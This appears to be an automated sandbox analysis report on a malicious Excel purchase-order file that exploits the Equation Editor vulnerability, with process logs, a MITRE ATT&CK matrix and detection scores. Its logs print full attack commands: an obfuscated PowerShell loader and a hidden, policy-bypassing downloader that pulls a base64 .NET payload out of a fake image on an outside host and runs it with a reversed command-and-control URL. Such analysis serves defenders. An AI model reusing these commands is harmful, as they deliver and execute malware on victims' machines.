Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'c:\programdata\' , 'word','addinprocess32',''))} }"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'c:\programdata\' , 'word','addinprocess32',''))} }"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	111 Command and Scripting Interpreter	221 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	43 Exploitation for Client Execution	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Modify Registry	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	23 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
xF3wienia PO2102559-1.xlsx	63%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882
xF3wienia PO2102559-1.xlsx	53%	Virustotal		Browse
xF3wienia PO2102559-1.xlsx	100%	Avira	EXP/CVE-2018-0798.Gen

Source	Detection	Scanner	Link
ajai.ydns.eu	3%	Virustotal	Browse
blessy.ydns.eu	2%	Virustotal	Browse
uploaddeimagens.com.br	7%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
